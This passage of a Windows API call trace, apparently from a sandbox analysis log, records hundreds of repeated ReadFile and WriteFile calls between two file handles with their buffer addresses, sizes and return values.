lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.949] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.950] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.951] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.951] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.953] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.954] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.955] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.955] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.956] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.957] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.958] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.958] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.959] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.962] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.962] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.962] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.963] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.963] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.964] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.965] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.966] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.967] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.968] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.968] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.969] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.969] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.970] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.970] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.971] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.972] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.973] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.973] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.973] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.974] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.974] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.975] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x242, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.976] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.977] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.979] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.982] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x73, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.985] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.986] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.986] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.987] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.987] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.987] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3ab, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.988] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.988] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.989] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.990] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.990] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.001] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.002] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.002] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.003] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.003] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.004] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.004] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.005] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.005] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.006] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.006] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.007] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.007] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.009] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, 